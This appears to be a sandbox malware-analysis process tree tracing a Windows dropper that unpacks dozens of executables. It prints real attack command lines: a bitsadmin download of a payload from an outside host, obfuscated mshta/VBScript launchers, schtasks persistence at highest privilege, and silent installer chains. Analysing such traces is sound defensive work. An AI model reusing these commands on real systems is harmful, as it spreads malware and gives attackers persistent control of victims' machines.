C:\Users\Admin\Pictures\Adobe Films\gHgO_RbTodz1O6ebHi6Ji1st.exe"C:\Users\Admin\Pictures\Adobe Films\gHgO_RbTodz1O6ebHi6Ji1st.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\kXBPRmvwpAukkEMWW9KDPQq0.exe"C:\Users\Admin\Pictures\Adobe Films\kXBPRmvwpAukkEMWW9KDPQq0.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IH5RO.tmp\kXBPRmvwpAukkEMWW9KDPQq0.tmp"C:\Users\Admin\AppData\Local\Temp\is-IH5RO.tmp\kXBPRmvwpAukkEMWW9KDPQq0.tmp" /SL5="$1038C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\kXBPRmvwpAukkEMWW9KDPQq0.exe"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-UQFV0.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-UQFV0.tmp\ShareFolder.exe" /S /UID=270911⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files\Uninstall Information\VHDYQFXRKD\foldershare.exe"C:\Program Files\Uninstall Information\VHDYQFXRKD\foldershare.exe" /VERYSILENT12⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\f2-dc351-333-22b96-d62e8cc31a28d\Waevuwexahae.exe"C:\Users\Admin\AppData\Local\Temp\f2-dc351-333-22b96-d62e8cc31a28d\Waevuwexahae.exe"12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e613⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff86f3746f8,0x7ff86f374708,0x7ff86f37471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff86f3746f8,0x7ff86f374708,0x7ff86f37471814⤵
-
C:\Users\Admin\AppData\Local\Temp\29-488ed-22e-6899c-d426a1dff55c2\Xyzhepuwytae.exe"C:\Users\Admin\AppData\Local\Temp\29-488ed-22e-6899c-d426a1dff55c2\Xyzhepuwytae.exe"12⤵
- Modifies system certificate store
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xd2bn1ks.21v\GcleanerEU.exe /eufive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\xd2bn1ks.21v\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\xd2bn1ks.21v\GcleanerEU.exe /eufive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13492 -s 24015⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5yvkkluv.fhg\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\5yvkkluv.fhg\installer.exeC:\Users\Admin\AppData\Local\Temp\5yvkkluv.fhg\installer.exe /qn CAMPAIGN="654"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jsuk1pcb.ows\any.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\jsuk1pcb.ows\any.exeC:\Users\Admin\AppData\Local\Temp\jsuk1pcb.ows\any.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\jsuk1pcb.ows\any.exe"C:\Users\Admin\AppData\Local\Temp\jsuk1pcb.ows\any.exe" -u15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\shx0f2xs.gwt\gcleaner.exe /mixfive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\shx0f2xs.gwt\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\shx0f2xs.gwt\gcleaner.exe /mixfive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15696 -s 23615⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xshmzhyk.kzf\autosubplayer.exe /S & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\xshmzhyk.kzf\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\xshmzhyk.kzf\autosubplayer.exe /S14⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB903.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB903.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB903.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB903.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB903.tmp\tempfile.ps1"15⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB903.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB903.tmp\tempfile.ps1"15⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z15⤵
- Download via BitsAdmin
-
C:\Users\Admin\Pictures\Adobe Films\uq_vDsUd_krUqeSYeUXPfpn7.exe"C:\Users\Admin\Pictures\Adobe Films\uq_vDsUd_krUqeSYeUXPfpn7.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-NK5KV.tmp\uq_vDsUd_krUqeSYeUXPfpn7.tmp"C:\Users\Admin\AppData\Local\Temp\is-NK5KV.tmp\uq_vDsUd_krUqeSYeUXPfpn7.tmp" /SL5="$103AE,506127,422400,C:\Users\Admin\Pictures\Adobe Films\uq_vDsUd_krUqeSYeUXPfpn7.exe"10⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-VI3N6.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-VI3N6.tmp\ShareFolder.exe" /S /UID=271011⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\67-87f51-2b5-91ea3-347efb3fd2da0\Ranynyxishu.exe"C:\Users\Admin\AppData\Local\Temp\67-87f51-2b5-91ea3-347efb3fd2da0\Ranynyxishu.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tejy3ssf.yct\GcleanerEU.exe /eufive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\tejy3ssf.yct\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\tejy3ssf.yct\GcleanerEU.exe /eufive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13316 -s 24015⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mcqlblni.nyx\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\mcqlblni.nyx\installer.exeC:\Users\Admin\AppData\Local\Temp\mcqlblni.nyx\installer.exe /qn CAMPAIGN="654"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gpcm2wim.dd3\any.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\gpcm2wim.dd3\any.exeC:\Users\Admin\AppData\Local\Temp\gpcm2wim.dd3\any.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\gpcm2wim.dd3\any.exe"C:\Users\Admin\AppData\Local\Temp\gpcm2wim.dd3\any.exe" -u15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pf2tpcla.fbp\gcleaner.exe /mixfive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\pf2tpcla.fbp\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\pf2tpcla.fbp\gcleaner.exe /mixfive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15060 -s 24015⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5h5kngla.uvw\autosubplayer.exe /S & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\5h5kngla.uvw\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\5h5kngla.uvw\autosubplayer.exe /S14⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshC2D7.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshC2D7.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshC2D7.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshC2D7.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshC2D7.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshC2D7.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshC2D7.tmp\tempfile.ps1"15⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z15⤵
- Download via BitsAdmin
-
C:\Users\Admin\Pictures\Adobe Films\y1NMjVm7jOPRU0QAYN13s4DO.exe"C:\Users\Admin\Pictures\Adobe Films\y1NMjVm7jOPRU0QAYN13s4DO.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"11⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff87888dec0,0x7ff87888ded0,0x7ff87888dee012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff607aa9e70,0x7ff607aa9e80,0x7ff607aa9e9013⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1744,10718864012829829378,14536187452262658042,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15796_393728450" --mojo-platform-channel-handle=1760 /prefetch:812⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\13bpu9cGZVQ3bQBYByHDZulD.exe"C:\Users\Admin\Pictures\Adobe Films\13bpu9cGZVQ3bQBYByHDZulD.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\gevrmQL0B4tD_i2ekUSkJq_0.exe"C:\Users\Admin\Pictures\Adobe Films\gevrmQL0B4tD_i2ekUSkJq_0.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\PNMKLAPwr5ErzUUHRjsBz37e.exe"C:\Users\Admin\Pictures\Adobe Films\PNMKLAPwr5ErzUUHRjsBz37e.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\mUWMZpz81mXRuU24Z6aKAGGB.exe"C:\Users\Admin\Pictures\Adobe Films\mUWMZpz81mXRuU24Z6aKAGGB.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\SolUXd1c40w2DqWZtvNdMZxs.exe"C:\Users\Admin\Pictures\Adobe Films\SolUXd1c40w2DqWZtvNdMZxs.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01866e4ba0024d.exe /mixone5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01866e4ba0024d.exeSat01866e4ba0024d.exe /mixone6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 2407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat0188dba58af938.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat0188dba58af938.exeSat0188dba58af938.exe6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\lvJ1Y9rsF3mHa5_BNzaFz0_L.exe"C:\Users\Admin\Pictures\Adobe Films\lvJ1Y9rsF3mHa5_BNzaFz0_L.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\L1MX6UmtRLpjxdXrFidSdrC_.exe"C:\Users\Admin\Pictures\Adobe Films\L1MX6UmtRLpjxdXrFidSdrC_.exe"7⤵
- Executes dropped EXE
-
C:\ProgramData\build.exe"C:\ProgramData\build.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 22169⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\RRcAmuN6urmWmx05CiuVFqIl.exe"C:\Users\Admin\Pictures\Adobe Films\RRcAmuN6urmWmx05CiuVFqIl.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\3sZAbBc0ZCBi_e8zV7ZuDvTL.exe"C:\Users\Admin\Pictures\Adobe Films\3sZAbBc0ZCBi_e8zV7ZuDvTL.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\0aGYt0jDJJ7fYapPkZzf1Us9.exe"C:\Users\Admin\Pictures\Adobe Films\0aGYt0jDJJ7fYapPkZzf1Us9.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 2368⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\CHjg5Y_u54NbfvxUap_GN9hB.exe"C:\Users\Admin\Pictures\Adobe Films\CHjg5Y_u54NbfvxUap_GN9hB.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\oiDNgvkGRj0prd4u1AFHb_VU.exe"C:\Users\Admin\Pictures\Adobe Films\oiDNgvkGRj0prd4u1AFHb_VU.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\zAxe7U5Ivhp5NRRY4S8viu_q.exe"C:\Users\Admin\Pictures\Adobe Films\zAxe7U5Ivhp5NRRY4S8viu_q.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\rwx8Lu_a1YRXVfir_uASkwht.exe"C:\Users\Admin\Pictures\Adobe Films\rwx8Lu_a1YRXVfir_uASkwht.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Chrome4 8KB.exe"C:\Users\Admin\AppData\Local\Temp\Chrome4 8KB.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\3092977.exe"C:\Users\Admin\AppData\Roaming\3092977.exe"10⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\4044792.exe"C:\Users\Admin\AppData\Roaming\4044792.exe"10⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\2957429.exe"C:\Users\Admin\AppData\Roaming\2957429.exe"10⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\4252378.exe"C:\Users\Admin\AppData\Roaming\4252378.exe"10⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1468265.exe"C:\Users\Admin\AppData\Roaming\1468265.exe"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOse( CreaTEOBjeCt ( "WsCRiPT.sHelL").RUn ("C:\Windows\system32\cmd.exe /Q /c tYpe ""C:\Users\Admin\AppData\Roaming\1468265.exe"" > seV03VBOUIE.eXe&& StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if """" =="""" for %N In (""C:\Users\Admin\AppData\Roaming\1468265.exe"" ) do taskkill -IM ""%~nxN"" /F" , 0 , TrUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /c tYpe "C:\Users\Admin\AppData\Roaming\1468265.exe" > seV03VBOUIE.eXe&&StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if "" =="" for %N In ("C:\Users\Admin\AppData\Roaming\1468265.exe" ) do taskkill -IM "%~nxN" /F12⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "1468265.exe" /F13⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Roaming\7203627.exe"C:\Users\Admin\AppData\Roaming\7203627.exe"10⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\125414.exe"C:\Users\Admin\AppData\Roaming\125414.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6816 -s 15089⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6816 -s 15089⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\kl8sNYvH953ODyX689F8z9zN.exe"C:\Users\Admin\Pictures\Adobe Films\kl8sNYvH953ODyX689F8z9zN.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3288 -s 3968⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\lgn2jnMR3V1GyJteBmyhVbIn.exe"C:\Users\Admin\Pictures\Adobe Films\lgn2jnMR3V1GyJteBmyhVbIn.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\o9iU5aPwGaExMJNYRipGWq3_.exe"C:\Users\Admin\Documents\o9iU5aPwGaExMJNYRipGWq3_.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\kVIu4LUPgqOOlQWfrfUbiHJa.exe"C:\Users\Admin\Pictures\Adobe Films\kVIu4LUPgqOOlQWfrfUbiHJa.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\D18fZksnEpyQMkyslyXdHEnd.exe"C:\Users\Admin\Pictures\Adobe Films\D18fZksnEpyQMkyslyXdHEnd.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 23610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\vewuFGCMun2_bCT3KhXW69qP.exe"C:\Users\Admin\Pictures\Adobe Films\vewuFGCMun2_bCT3KhXW69qP.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\Gcgaq2iYSkgHI5IxJUco2ilG.exe"C:\Users\Admin\Pictures\Adobe Films\Gcgaq2iYSkgHI5IxJUco2ilG.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 24010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\9pWn6NBJx_K2SGbDf29INsJQ.exe"C:\Users\Admin\Pictures\Adobe Films\9pWn6NBJx_K2SGbDf29INsJQ.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\gPZAHBz3UM5O11aLJcsQVZ0j.exe"C:\Users\Admin\Pictures\Adobe Films\gPZAHBz3UM5O11aLJcsQVZ0j.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FCNKA.tmp\gPZAHBz3UM5O11aLJcsQVZ0j.tmp"C:\Users\Admin\AppData\Local\Temp\is-FCNKA.tmp\gPZAHBz3UM5O11aLJcsQVZ0j.tmp" /SL5="$2036A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\gPZAHBz3UM5O11aLJcsQVZ0j.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2IAHC.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-2IAHC.tmp\ShareFolder.exe" /S /UID=271011⤵
-
C:\Users\Admin\AppData\Local\Temp\57-2e2df-366-c46a0-cc3b7487d62d1\Gigizhulusa.exe"C:\Users\Admin\AppData\Local\Temp\57-2e2df-366-c46a0-cc3b7487d62d1\Gigizhulusa.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qlzrjnwp.4x4\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\qlzrjnwp.4x4\setting.exeC:\Users\Admin\AppData\Local\Temp\qlzrjnwp.4x4\setting.exe SID=778 CID=778 SILENT=1 /quiet14⤵
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\qlzrjnwp.4x4\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\qlzrjnwp.4x4\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630507832 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ra5kig3t.5m4\GcleanerEU.exe /eufive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\ra5kig3t.5m4\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ra5kig3t.5m4\GcleanerEU.exe /eufive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9684 -s 24015⤵
- Program crash
